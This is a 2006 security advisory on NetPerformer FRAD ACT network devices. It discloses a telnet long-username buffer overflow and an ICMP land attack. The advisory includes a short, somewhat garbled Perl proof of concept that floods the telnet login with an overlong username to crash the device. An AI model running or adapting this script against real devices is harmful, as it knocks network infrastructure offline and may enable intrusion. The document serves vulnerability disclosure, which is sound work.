NetPerformer FRAD ACT Multiple Vulnerabilities
See this note in TXT Version
NetPerformer Frame Relay Access Device (FRAD) ACT Multiple Vulnerabilities
.<=[ Arif Jatmoko ]=>.
Release Date : 8 July 2006
Product Affected :
- NetPerformer FRAD ACT SDM-95xx version 7.xx (R1), earlier, and
- NetPerformer FRAD ACT SDM-93xx version 10.x.x (R2), earlier, and
- NetPerformer FRAD ACT SDM-92xx version 9.x.x (R1), earlier, and
Web Site :
NetPerformer Frame Relay Access Device (FRAD) is switching & routing device
that support Ethernet and SNA protocols, Voice, etc. This device mainly
used for connecting distributed WAN network through frame relay or ATM
1. Telnet long username Buffer Overflow.
Passing an overly long username (>4550 char) against telnet service causes
device to reboot. Successful remote exploitation will possibly allows an
attacker gaining access into the device.
my($socket) = "";
if ($socket = IO::Socket::INET->new(PeerAddr => $ARGV,
PeerPort => "23",
Proto => "TCP"))
print "Modhiar'000 ..... killing netperformer ... $ARGV
print $socket "LOGIN " . "A" x 4550 . "BCDErn";
print $socket "PASS " . "rn";
print "Cannot connect to $ARGV:23n";
2. ICMP Land Attack
By sending specially crafted ICMP packets will causes the device to be hang
up and resetting current TCP handshake connection. In earlier version
possibly will make device to reboot.
No Workaround yet for this vulnerability.
Vendor Response Status :
Vendor response very slow since discovered the above vulnerabilities.
Arif Jatmoko //=.
Information System Security Officer
Coca-Cola Bottling Indonesia